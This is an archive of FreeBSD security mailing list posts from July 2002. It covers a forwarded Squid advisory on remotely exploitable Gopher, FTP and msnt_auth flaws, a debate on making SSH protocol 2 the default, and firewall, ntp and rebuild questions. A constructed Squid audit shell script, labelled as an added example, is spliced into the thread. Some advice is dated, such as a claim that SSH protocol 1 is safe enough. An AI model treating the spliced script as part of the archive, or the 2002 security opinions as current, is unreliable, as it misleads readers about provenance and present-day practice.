From owner-freebsd-security Thu Jul 4 1: 8: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B2E3237B405; Thu, 4 Jul 2002 01:07:24 -0700 (PDT) Received: from mail.imp.ch (mail.imp.ch [157.161.1.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 50A3543E09; Thu, 4 Jul 2002 01:07:23 -0700 (PDT) (envelope-from mb@imp.ch) Received: from nbs.imp.ch (nbs.imp.ch [157.161.4.7]) by mail.imp.ch (8.11.6/8.11.6) with ESMTP id g6487Mj90017; Thu, 4 Jul 2002 10:07:22 +0200 (CEST) Received: from levais.imp.ch (levais.imp.ch [157.161.4.66]) by nbs.imp.ch (8.12.3/8.12.3) with ESMTP id g6487L9014592705; Thu, 4 Jul 2002 10:07:21 +0200 (MES) Date: Thu, 4 Jul 2002 10:09:27 +0200 (CEST) From: Martin Blapp To: Cc: Subject: Squid Security Update Advisory 2002:3 (fwd) Message-ID: <20020704100815.G39132-100000@levais.imp.ch> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi, I just got this on bugtraq ...
---------- Forwarded message ----------
From: Henrik Nordstrom
Organization: MARA Systems AB
To: Bugtraq
Subject: Squid Security Update Advisory 2002:3
Date: Wed, 3 Jul 2002 23:25:06 +0200
Message-Id: <200207032325.07003@henrik.marasystems.com>

__________________________________________________________________

      Squid Proxy Cache Security Update Advisory SQUID-2002:3
__________________________________________________________________

Advisory ID:            SQUID-2002:3
Date:                   July 3, 2002
Summary:                Squid-2.4.STABLE7 released to address a
                        number of security related issues.
Affected versions:      Squid-2.x up to and including 2.4.STABLE6
__________________________________________________________________

  http://www.squid-cache.org/Advisories/SQUID-2002_3.txt
__________________________________________________________________

Problem Description:

 squid-2.4.STABLE7 has been released to address a number of
 security issues in Squid and related software. All users of the
 Squid HTTP Proxy are strongly encouraged to upgrade.

 Security related changes in the 2.4.STABLE7 release:

 - Several bugfixes and cleanup of the Gopher client, both to
   correct some security issues and to make Squid properly render
   certain Gopher menus.

 - Security fixes in how Squid parses FTP directory listings into
   HTML

 - FTP data channels are now sanity checked to match the address of
   the requested FTP server. This is to prevent theft or injection
   of data. See the new ftp_sanitycheck directive if this sanity
   check is not desired.

 - The MSNT auth helper has been updated to v2.0.3+fixes for buffer
   overflow security issues found in this helper.

 - A security issue in how Squid forwards proxy authentication
   credentials has been fixed

 Other changes in the 2.4.STABLE7 release:

 - Squid now correctly rejects any requests using
   transfer-encoding. Squid is a HTTP/1.0 proxy and as such does
   not implement or support transfer-encoding.

 - Minor changes to support Apple MAC OS X and some other platforms
   more easily.

 - The client -T option has been implemented

 - HTCP related bugfixes in "squid -k reconfigure"

 For more details on the changes see the descriptions in our patch
 archive for version Squid-2.4.STABLE6:

  http://www.squid-cache.org/Versions/v2/2.4/bugs/

------------------------------------------------------------------

Severity:

 It is believed that several of the Gopher bugs and the FTP
 directory parsing related bugs can be exploited to allow remote
 execution of code. The user executing the attack must be allowed
 to use the proxy for any potential attack to be successful, but it
 is believed that a remote attacker can use a small amount of
 social engineering to make an attack without direct access to the
 proxy.

 The third issue relating to FTP data channels is minor in nature
 in most installations, but there may be unfortunate interactions
 with firewalling policies etc making it a more severe issue than
 normal.

 The MSNT auth helper issue is believed to possibly allow remote
 execution of code in certain configurations.

 The issue in forwarding of proxy authentication credentials may
 expose your users' private proxy login+password to selected
 external web sites depending on your configuration.

__________________________________________________________________

Updated Packages:

 The Squid-2.4.STABLE7 release contains fixes for all these
 problems. You can download the Squid-2.4.STABLE7 release from

  ftp://ftp.squid-cache.org/pub/squid-2/STABLE/
  http://www.squid-cache.org/Versions/v2/2.4/

 or the mirrors (may take a while before all mirrors are updated).
 For a list of mirror sites see

  http://www.squid-cache.org/Mirrors/ftp-mirrors.html
  http://www.squid-cache.org/Mirrors/http-mirrors.html

 Individual patches to the mentioned issues can be found from our
 patch archive for version Squid-2.4.STABLE6

  http://www.squid-cache.org/Versions/v2/2.4/bugs/

 The patches should also apply with only a minimal effort to
 earlier Squid 2.4 versions if required.

 If you are using a prepackaged version of Squid then please refer
 to the package vendor for availability information on updated
 packages.

__________________________________________________________________

Determining if your version is vulnerable:

 To determine which version of Squid you are using, run the command

  squid -v

 You are likely to be vulnerable to these issues if you are running
 version 2.4.STABLE6 or earlier. If you are using a binary or
 otherwise pre-packaged version please verify with your vendor on
 which versions are affected as some vendors ship earlier versions
 with the needed patches applied. Note that unless you have
 upgraded to a version released after 2002-07-01 you are most
 likely vulnerable to these issues.

 There is no easy means to determine if your version is affected
 other than by the Squid version number.

 You may be vulnerable to the MSNT auth issue if your squid.conf
 file contains the directive

  authenticate_program /usr/local/squid/libexec/squid/msnt_auth

 and you have not upgraded your copy of msnt_auth to a corrected
 version

 Note: msnt_auth is sometimes installed as msntauth, and the path
 may differ depending on the installation method.

__________________________________________________________________

Other versions of Squid:

 Versions prior to the 2.4 series are deprecated, please update to
 Squid-2.4.STABLE7 if you are using a version older than 2.4.

 Users of unreleased versions of squid (2.6.DEVEL or 2.5.PRE
 versions) should run the most recent version available to ensure
 that security issues arising during the development are addressed
 as quickly as possible. Furthermore, unreleased versions should
 not be used in a production environment.

__________________________________________________________________

Workarounds:

 We recommend that you upgrade rather than try to work around the
 issues by configuration. To most of the issues there are no easy
 workarounds that do not severely impact the functionality.

 The Gopher and FTP issues can be worked around by denying proxying
 of ftp:// or gopher:// URLs, for example by inserting the
 following lines at the top of your squid.conf

  # Workaround for bugs in Squid-2.4.STABLE6 and earlier
  acl workaround proto FTP Gopher
  http_access deny workaround

 The authentication credentials issue only applies if you are using
 proxy authentication, allow users access to some sites without the
 need to authenticate and you do not fully trust these sites or the
 network between these sites and the proxy. To work around the
 problem make sure your users need to authenticate on all sites or
 none.

 If you are using the msnt_auth authentication helper then you are
 only vulnerable if you are using the allowusers or denyusers
 extension of msnt_auth. To work around this defiance of msnt_auth
 you can use the proxy_auth acl type to specify the valid users and
 delete the allowusers and denyusers files.

__________________________________________________________________

Contact details for the squid project:

 For installation / upgrade support: Your first point of contact
 should be your binary package vendor.

 If your install is built from the original squid sources, then the
 squid-users@squid-cache.org mailing list is your primary support
 point. (see for subscription details).

 For bug reporting, particularly security related bugs the
 squid-bugs@squid-cache.org mailing list is the appropriate forum.
 It's a closed list (though anyone can post) and security related
 bug reports are treated in confidence until the impact has been
 established. For non security related bugs, the squid bugzilla
 database should be used .

__________________________________________________________________

Credits:

 Olaf Kirch (formerly @ Caldera), for reporting the FTP and Gopher
 related issues

 MARA Systems AB, for sponsoring the development of patches to the
 FTP, Gopher, authentication and transfer encoding issues.

 Duane Wessels, for fixes to the MSNT auth helper

__________________________________________________________________

Revision history:

 2002-07-03 21:10 GMT Initial release
__________________________________________________________________
END

From owner-freebsd-security Thu Jul 4 3: 0:26 2002
Date: Thu, 4 Jul 2002 14:00:19 +0400
From: "Sergey A. Osokin"
To: Martin Blapp
Cc: adrian@freebsd.org, security@freebsd.org
Subject: Re: Squid Security Update Advisory 2002:3 (fwd)
Message-ID: <20020704100019.GA43573@freebsd.org.ru>
References: <20020704100815.G39132-100000@levais.imp.ch>
In-Reply-To: <20020704100815.G39132-100000@levais.imp.ch>

On Thu, Jul 04, 2002 at 10:09:27AM +0200, Martin Blapp wrote:
>
> Hi,
>
> I just got this on bugtraq ...
>
> __________________________________________________________________
>
> Squid Proxy Cache Security Update Advisory SQUID-2002:3
> __________________________________________________________________
>
> Advisory ID: SQUID-2002:3
> Date: July 3, 2002
> Summary: Squid-2.4.STABLE7 released to address a
> number of security related issues.
> Affected versions: Squid-2.x up to and including 2.4.STABLE6
> __________________________________________________________________
>
> http://www.squid-cache.org/Advisories/SQUID-2002_3.txt
> __________________________________________________________________

Yes, please look at
http://www.freebsd.org/cgi/query-pr.cgi?pr=ports/40175

Thanks.
--
Rgdz,
Sergey Osokin, osa@FreeBSD.org.ru
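
The checks that the SQUID-2002:3 advisory forwarded above describes (version number from `squid -v`, the msnt_auth helper directive, and the FTP/Gopher deny rules placed ahead of any allow rule) can be collected into one script. This is an added example, not part of any message in this thread and not code from the Squid project; the function names and the sample files are constructed, and the `Squid Cache: Version` line is the assumed format of the `squid -v` output.

```sh
#!/bin/sh
# Added example: the self-checks from advisory SQUID-2002:3 as shell functions.
# All function names and sample inputs below are constructed for illustration.

# Read the text of `squid -v` on stdin and print the version token.
squid_version_from_output() {
    sed -n 's/^Squid Cache: Version \([^ ]*\).*$/\1/p' | head -n 1
}

# Classify a version string by number alone, as the advisory does:
# 2.x up to and including 2.4.STABLE6 is likely vulnerable. Anything the
# advisory does not pin down (2.5.PRE, 2.6.DEVEL, vendor builds) is "unknown".
classify_squid_version() {
    case $1 in
        2.4.STABLE*)
            n=${1#2.4.STABLE}
            case $n in
                ''|*[!0-9]*) echo unknown ;;
                *) if [ "$n" -le 6 ]; then echo likely-vulnerable
                   else echo fixed; fi ;;
            esac ;;
        2.[0-3].*) echo likely-vulnerable ;;
        *) echo unknown ;;
    esac
}

# Succeeds if squid.conf ($1) has an active authenticate_program line that
# runs msnt_auth (or msntauth, the alternate name the advisory mentions).
uses_msnt_helper() {
    grep -Eq '^[[:space:]]*authenticate_program[[:space:]]+[^#[:space:]]*msnt_?auth([[:space:]]|$)' "$1"
}

# Succeeds if squid.conf ($1) denies both FTP and Gopher via proto ACLs
# before the first "http_access allow" line. The advisory says to put the
# rules at the top of the file; a deny that follows an allow is not counted.
workaround_in_place() {
    awk '
        { sub(/#.*/, "") }                        # ignore comments
        $1 == "acl" && tolower($3) == "proto" {
            for (i = 4; i <= NF; i++) protos[$2] = protos[$2] " " tolower($i)
        }
        $1 == "http_access" && $2 == "allow" { allow_seen = 1 }
        $1 == "http_access" && $2 == "deny" && NF == 3 && !allow_seen {
            if (protos[$3] ~ / ftp( |$)/)    ftp = 1
            if (protos[$3] ~ / gopher( |$)/) gopher = 1
        }
        END { exit !(ftp && gopher) }
    ' "$1"
}

# $1 = file holding `squid -v` output, $2 = path to squid.conf
audit_squid() {
    ver=$(squid_version_from_output < "$1")
    status=$(classify_squid_version "$ver")
    echo "version=$ver status=$status"
    [ "$status" = fixed ] && return 0
    if workaround_in_place "$2"; then
        echo "ftp/gopher workaround: in place"
    else
        echo "ftp/gopher workaround: missing or placed after an allow rule"
    fi
    if uses_msnt_helper "$2"; then
        echo "msnt_auth helper in use: check its version and allowusers/denyusers files"
    fi
}

# Constructed sample input: an affected version, and a squid.conf where the
# workaround was appended after "http_access allow all" instead of at the top.
demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
printf '%s\n' 'Squid Cache: Version 2.4.STABLE6' \
    'configure options: --prefix=/usr/local/squid' > "$demo_dir/squid-v.txt"
cat > "$demo_dir/squid.conf" <<'EOF'
# constructed sample squid.conf
authenticate_program /usr/local/squid/libexec/squid/msnt_auth
acl all src 0.0.0.0/0.0.0.0
acl workaround proto FTP Gopher
http_access allow all
http_access deny workaround
EOF
audit_squid "$demo_dir/squid-v.txt" "$demo_dir/squid.conf"
```

On a real host, feed it `squid -v > squid-v.txt` and the path of the installed squid.conf; for vendor packages the version number alone is not decisive, as the advisory notes.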

From owner-freebsd-security Fri Jul 5 4:46: 5 2002
To: Mike Tancsa
Cc: Ruslan Ermilov, security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12>
From: Dag-Erling Smorgrav
Date: 05 Jul 2002 13:45:56 +0200
In-Reply-To: <5.1.0.14.0.20020705073043.01c52198@192.168.0.12>

[moving from -stable to -security, bcc: to -stable and security-team]

Mike Tancsa writes:
> As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> time to make the 2,1 the default instead ?

I'd like that. I think the only reason for the old default was not to
surprise users who had the ssh1 RSA host key in their known_hosts but
not the ssh2 DSA host key.

What do people think about this? Keep 2,1 or revert to 1,2?

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Fri Jul 5 4:53: 7 2002
Date: Fri, 5 Jul 2002 13:49:34 +0200
From: Thomas Quinot
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov, security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Message-ID: <20020705134934.A40046@melusine.cuivre.fr.eu.org>
Reply-To: thomas@cuivre.fr.eu.org
References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12>
In-Reply-To: ; from des@ofug.org on Fri, Jul 05, 2002 at 01:45:56PM +0200

On 2002-07-05, Dag-Erling Smorgrav wrote:

> What do people think about this? Keep 2,1 or revert to 1,2?

Since the version change is going to surprise people anyway, I'd say let
us do it all the way and switch to protocol 2,1. It is more than time
to phase out protocol 1.
--
Thomas.Quinot@Cuivre.FR.EU.ORG

From owner-freebsd-security Fri Jul 5 5: 6:18 2002
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
From: Larry Rosenman
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov, security@FreeBSD.ORG
References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12>
Date: 05 Jul 2002 07:02:53 -0500
Message-Id: <1025870573.401.1.camel@lerlaptop.lerctr.org>

On Fri, 2002-07-05 at 06:45, Dag-Erling Smorgrav wrote:
> [moving from -stable to -security, bcc: to -stable and security-team]
>
> Mike Tancsa writes:
> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> > time to make the 2,1 the default instead ?
>
> I'd like that. I think the only reason for the old default was not to
> surprise users who had the ssh1 RSA host key in their known_hosts but
> not the ssh2 DSA host key.
>
> What do people think about this? Keep 2,1 or revert to 1,2?

It would seem that this is an appropriate time. SSH1 is old, and SSH2
is mature enough. With all the other changes, this wouldn't be a big
POLA violation.

--
Larry Rosenman http://www.lerctr.org/~ler
Phone: +1 972-414-9812 E-Mail: ler@lerctr.org
US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749

From owner-freebsd-security Fri Jul 5 5:11:28 2002
Date: Fri, 5 Jul 2002 15:11:25 +0300
From: Peter Pentchev
To: Thomas Quinot
Cc: Dag-Erling Smorgrav, Mike Tancsa, Ruslan Ermilov, security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Message-ID: <20020705121125.GF494@straylight.oblivion.bg>
References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12> <20020705134934.A40046@melusine.cuivre.fr.eu.org>
In-Reply-To: <20020705134934.A40046@melusine.cuivre.fr.eu.org>

On Fri, Jul 05, 2002 at 01:49:34PM +0200, Thomas Quinot wrote:
> On 2002-07-05, Dag-Erling Smorgrav wrote:
>
> > What do people think about this? Keep 2,1 or revert to 1,2?
>
> Since the version change is going to surprise people anyway, I'd say let
> us do it all the way and switch to protocol 2,1. It is more than time
> to phase out protocol 1.

Seconded.

G'luck,
Peter

--
Peter Pentchev roam@ringlet.net roam@FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
What would this sentence be like if it weren't self-referential?

From owner-freebsd-security Fri Jul 5 5:30:20 2002
Message-ID: <3D258B39.2050405@sumy.net>
Date: Fri, 05 Jul 2002 15:04:09 +0300
From: Sergey Solyanik
Organization: Fort Ochka, XY.
Cc: security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12>

Dag-Erling Smorgrav wrote:

> What do people think about this? Keep 2,1 or revert to 1,2?

keep 2,1, please!

--
I'll see you on the dark side of the moon...
From owner-freebsd-security Fri Jul 5 7: 1:50 2002
Date: Fri, 5 Jul 2002 10:01:45 -0400 (EDT)
From: Trevor Johnson
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Message-ID: <20020705094314.C73784-100000@blues.jpj.net>

> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> > time to make the 2,1 the default instead ?
>
> I'd like that. I think the only reason for the old default was not to
> surprise users who had the ssh1 RSA host key in their known_hosts but
> not the ssh2 DSA host key.
>
> What do people think about this? Keep 2,1 or revert to 1,2?

Use of protocol version 1 makes an insertion attack possible, according to
. The vulnerability was
published by CORE SDI in June of 1998. I would like to see protocol
version 1 disabled by default, with a note in UPDATING about the change.

--
Trevor Johnson

From owner-freebsd-security Fri Jul 5 7:11: 7 2002
To: Trevor Johnson
Cc: Mike Tancsa, Ruslan Ermilov
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
References: <20020705094314.C73784-100000@blues.jpj.net>
From: Dag-Erling Smorgrav
Date: 05 Jul 2002 16:11:01 +0200
In-Reply-To: <20020705094314.C73784-100000@blues.jpj.net>

Trevor Johnson writes:
> Use of protocol version 1 makes an insertion attack possible, according to
> .

That same page also explains that OpenSSH contains code to make such
attacks very difficult.

> The vulnerability was
> published by CORE SDI in June of 1998. I would like to see protocol
> version 1 disabled by default, with a note in UPDATING about the change.

No.
I will not arbitrarily lock users out of their machines.

DES
--
Dag-Erling Smorgrav - des@ofug.org

From owner-freebsd-security Fri Jul 5 10:41:38 2002
Message-ID: <3D25DA4B.7060703@gmx.de>
Date: Fri, 05 Jul 2002 19:41:31 +0200
From: Siegbert Baude
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov, security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
References: <20020705073634.GA64656@sunbay.com> <20020705073634.GA64656@sunbay.com> <5.1.0.14.0.20020705073043.01c52198@192.168.0.12>

Dag-Erling Smorgrav wrote:
> [moving from -stable to -security, bcc: to -stable and security-team]
>
> Mike Tancsa writes:
>
>>As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
>>time to make the 2,1 the default instead ?
>
>
> I'd like that. I think the only reason for the old default was not to
> surprise users who had the ssh1 RSA host key in their known_hosts but
> not the ssh2 DSA host key.
>
> What do people think about this? Keep 2,1 or revert to 1,2?

My opinion is: Go for the change, there will pass a long time until this
opportunity will come again. But then, I only have to support 100
clients. The people with really big crowds to support may think
differently.

Ciao
Siegbert

From owner-freebsd-security Fri Jul 5 10:55:25 2002
To: Dag-Erling Smorgrav
Cc: Mike Tancsa, Ruslan Ermilov, security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
In-reply-to: Your message of "05 Jul 2002 13:45:56 +0200."
Date: Fri, 05 Jul 2002 10:55:19 -0700
From: "Kevin Oberman"
Message-Id: <20020705175519.B31B95D03@ptavv.es.net>

> From: Dag-Erling Smorgrav
> Date: 05 Jul 2002 13:45:56 +0200
> Sender: owner-freebsd-stable@FreeBSD.ORG
>
> [moving from -stable to -security, bcc: to -stable and security-team]
>
> Mike Tancsa writes:
> > As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
> > time to make the 2,1 the default instead ?
>
> I'd like that. I think the only reason for the old default was not to
> surprise users who had the ssh1 RSA host key in their known_hosts but
> not the ssh2 DSA host key.
>
> What do people think about this? Keep 2,1 or revert to 1,2?

Keep 2,1. It's the best for many reasons and it's about time to live
with a bit of astonishment.

It should be added to UPDATING, though. (Let's keep the astonishment
to a minimum.)

FWIW, I changed my systems to 2,1 at least 4 months ago.

R. Kevin Oberman, Network Engineer
Energy Sciences Network (ESnet)
Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
E-mail: oberman@es.net Phone: +1 510 486-8634

From owner-freebsd-security Fri Jul 5 12:30:25 2002
Date: Fri, 5 Jul 2002 14:30:17 -0500 (CDT)
Message-Id: <200207051930.g65JUH220467@sheol.localdomain>
Reply-To: hawkeyd@visi.com
Organization: if (!FIFO) if (!LIFO) break;
References: <5.1.0.14.0.20020705073043.01c52198_192.168.0.12@ns.sol.net>
From: hawkeyd@visi.com (D J Hawkey Jr)
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
To: des@ofug.org, freebsd-security@freebsd.org

In article , des@ofug.org writes:
> [moving from -stable to -security, bcc: to -stable and security-team]
>
> Mike Tancsa writes:
>> As a lot has changed with OpenSSH in FreeBSD, perhaps now is a good
>> time to make the 2,1 the default instead ?
>
> I'd like that. I think the only reason for the old default was not to
> surprise users who had the ssh1 RSA host key in their known_hosts but
> not the ssh2 DSA host key.
>
> What do people think about this? Keep 2,1 or revert to 1,2?

The former. And note it in UPDATING.

FWIW, I've been setting machines I'm responsible for to 2 only for some
time now.

> DES

Dave

--
Windows: "Where do you want to go today?"
Linux: "Where do you want to go tomorrow?"
FreeBSD: "Are you guys coming, or what?"

From owner-freebsd-security Fri Jul 5 13: 7:12 2002
From: "Kim Okasawa"
To: _@r4k.net
Cc: freebsd-security@freebsd.org
Subject: Re: Any security issues with root's cron job?
Date: Sat, 06 Jul 2002 05:07:06 +0900

>From: Stephanie Wehner <_@r4k.net>
>To: Kim Okasawa
>Subject: Re: Any security issues with root's cron job?
>Date: Wed, 3 Jul 2002 16:48:37 +0200
>
>Hi Kim,
>
> > Can anyone think of any potential security risks to such practice?
> >Any suggestions and comments are greatly appreciated. Thank you!
>
>Not from the cronjob directly, however why would you want to change
>your ipfw rule set according to time ?
>
>What I would check in this case is how your machine keeps time,
>eg it must be rather accurate. Also, by getting timing information
>from a remote ntp server for example would then mean you place your
>firewall rules pretty much into their hands.
>

Hi Stephanie:

Good thinking. You are absolutely right! The time should be rather
accurate in order for this to function correctly. How about letting
the server run its ntp service? Clients who want to access the server
would have to sync with it if necessary. But this means that the
firewall needs to open the ntp port and may create other problems.

What I want is to create a virtual timed vault that only allows the
world to access certain services within a specific period of time. In
my case, some services/ports don't need to be available to the public
from 8PM-8AM. Closing those ports may mean less trouble.

Any suggestion on how to deal with the ntp problem? Thanks.
Best Regards,
Kim

From owner-freebsd-security Fri Jul 5 13: 8:14 2002
Date: Fri, 5 Jul 2002 13:07:37 -0700
From: "Crist J. Clark"
To: Amy Shaftoe
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Rebuilding the static programs
Message-ID: <20020705130737.A17982@blossom.cjclark.org>

On Wed, Jul 03, 2002 at 09:26:43PM -0500, Amy Shaftoe wrote:
> Since I don't have enough disk space to do a make world on my
> 4.6-RELEASE system, I was going to rebuild libc and the static
> programs individually after applying the FreeBSD-SA-02:28.resolv
> patch.
>
> I applied the patch then did a "make", "make install" and a "make
> clean" in /usr/src/lib/libc. That went fine. Then I did the same
> in /usr/src/sbin and that went fine. But in /usr/src/bin it dies
> with this:
>
> >===> rmail
> >Warning: Object directory not changed from original /usr/src/bin/rmail
> >ln -sf
> >/usr/src/bin/rmail/../../contrib/sendmail/include/sm/os/sm_os_freebsd.h
> >sm_os.h
> >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall
> >-Wformat -c /usr/src/bin/rmail/../../contrib/sendmail/rmail/rmail.c
> >cc -O -pipe -I/usr/src/bin/rmail/../../contrib/sendmail/include -I. -Wall
> >-Wformat -o rmail rmail.o /usr/src/bin/rmail/../../lib/libsm/libsm.a
> >cc: /usr/src/bin/rmail/../../lib/libsm/libsm.a: No such file or directory
> >*** Error code 1
> >
> >Stop in /usr/src/bin/rmail.
> >*** Error code 1
> >
> >Stop in /usr/src/bin.
>
> Is this expected behavior?

Yes.

> Should you be able to rebuild the
> system in this manner?

Yes and no. No, you cannot expect to change to an arbitrary directory
in /usr/src, type, 'make install' and expect it to work. But yes you
can build parts of the system this way if you really know what you are
doing.

-- 
Crist J.
Clark | cjclark@alum.mit.edu | cjclark@jhu.edu
http://people.freebsd.org/~cjc/ | cjc@freebsd.org

From owner-freebsd-security Fri Jul 5 13:19:42 2002
Date: Fri, 5 Jul 2002 16:19:34 -0400
From: Brian Reichert
To: Kim Okasawa
Cc: _@r4k.net, freebsd-security@freebsd.org
Subject: Re: Any security issues with root's cron job?
Message-ID: <20020705161934.E259@numachi.com>

On Sat, Jul 06, 2002 at 05:07:06AM +0900, Kim Okasawa wrote:
> >From: Stephanie Wehner <_@r4k.net>
> >To: Kim Okasawa
> >Subject: Re: Any security issues with root's cron job?
> >Date: Wed, 3 Jul 2002 16:48:37 +0200
> >
> >Hi Kim,
> >
> > > Can anyone think of any potential security risks to such practice?
> > >Any suggestions and comments are greatly appreciated. Thank you!
> >
> >Not from the cronjob directly, however why would you want to change
> >your ipfw rule set according to time ?
> >
> >What I would check in this case is how your machine keeps time,
> >e.g. it must be rather accurate.
> >Also, by getting timing information
> >from a remote ntp server for example would then mean you place your
> >firewall rules pretty much into their hands.
> >
>
> Hi Stephanie:
>
> Good thinking. You are absolutely right! The time should be rather
> accurate in order for this to function correctly. How about letting the
> server run its ntp service? Clients who want to access the server
> would have to sync with it if necessary. But this means that the firewall
> needs to open the ntp port and may create other problems.

You don't _need_ a NTP server on your vault if you have access to
one that you trust. I feel that most institutions should set up a
peered set of stratum-3 servers, out of hand, and sync internal
hosts to those; this cuts down on network traffic, if nothing else.

(You could even force them to use your time server(s) via divert.)

If your vault is to merely be an NTP client, then it will poll your
time server(s); you can firewall out spoofed replies.

If your time server is also to be a NTP server, then it will need
to be able to serve requests from your LAN.

These are both easily locked down via ipfw.

>
> What I want is to create a virtual timed vault that only allows the world to
> access certain services within a specific period of time. In my case,
> some services/ports don't need to be available to the public from 8PM-8AM.
> Closing those ports may mean less trouble.
>
> Any suggestion on how to deal with the ntp problem? Thanks.
>
> Best Regards,
> Kim
>

-- 
Brian 'you Bastard' Reichert
37 Crystal Ave.
#303 Daytime number: (603) 434-6842
Derry NH 03038-1713 USA Intel architecture: the left-hand path

From owner-freebsd-security Fri Jul 5 13:26:47 2002
Date: Fri, 5 Jul 2002 13:26:40 -0700
From: "Crist J. Clark"
To: Michael Sharp
Cc: freebsd-security@FreeBSD.ORG, freebsd-questions@FreeBSD.ORG
Subject: Re: ssk-keygen
Message-ID: <20020705132640.B17982@blossom.cjclark.org>

On Thu, Jul 04, 2002 at 01:31:31AM -0400, Michael Sharp wrote:
> I did a cvsup of RELENG_4 about 2 hours ago (July 4th @ 12:05 am) and
> noticed the new openssh3.4p1 and pam.conf source so I decided to make
> world. On reboot, ssh-keygen fails to make RSA keys because in
> rc.network there is no -t rsa option when running ssh-keygen. ***I
> changed it*** and all is well. This is likely to come up on the
> questions and security list for those that did a cvsup at about the
> same time I did. I'm sure it's been discovered and fixed by now.
>
> ***
> if [ ! -f /etc/ssh/ssh_host_key ]; then
> echo ' creating ssh RSA host key';
> /usr/bin/ssh-keygen -t rsa -N "" -f /etc/ssh/ssh_host_key
> ***

You told it to generate the wrong key. ssh_host_key should hold a
protocol 1 key,

  /usr/bin/ssh-keygen -t rsa1 -N "" -f /etc/ssh/ssh_host_key
                            ^
And yes, this has been fixed in RELENG_4.

-- 
Crist J.
Clark | cjclark@alum.mit.edu | cjclark@jhu.edu
http://people.freebsd.org/~cjc/ | cjc@freebsd.org

From owner-freebsd-security Fri Jul 5 18:58:30 2002
Date: Sat, 6 Jul 2002 03:58:23 +0200
From: Aragon Gouveia
To: security@freebsd.org
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Message-ID: <20020706015823.GB7058@phat.za.net>

| By Dag-Erling Smorgrav
| [ 2002-07-05 14:02 +0200 ]
> What do people think about this? Keep 2,1 or revert to 1,2?

I think 2,1 is a good idea too.
Regards,
Aragon

From owner-freebsd-security Fri Jul 5 19:49: 6 2002
Message-Id: <4.3.2.7.2.20020705204451.02607930@localhost>
Date: Fri, 05 Jul 2002 20:48:15 -0600
To: thomas@cuivre.fr.eu.org, Dag-Erling Smorgrav
From: Brett Glass
Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1]
Cc: Mike Tancsa, Ruslan Ermilov, security@FreeBSD.ORG

At 05:49 AM 7/5/2002, Thomas Quinot wrote:

>Since the version change is going to surprise people anyway, I'd say let
>us do it all the way and switch to protocol 2,1. It is more than time
>to phase out protocol 1.

Alas, too many clients use Protocol 1 only. And Protocol 1 really isn't
that bad, security-wise!
In fact, after the rash of recent bugs in code that's exclusively used
by Protocol 2 (with, I suspect, more yet to be found), I've set quite a
few servers that really only communicate with Protocol 1 clients to do
Protocol 1 only. I may reconsider this move in a year or so, but for
now it seems to be the safest way to go.

--Brett Glass

From owner-freebsd-security Fri Jul 5 20:29:22 2002
Message-ID: <20020706032916.35363.qmail@web10105.mail.yahoo.com>
Date: Fri, 5 Jul 2002 20:29:16 -0700 (PDT)
From: twig les
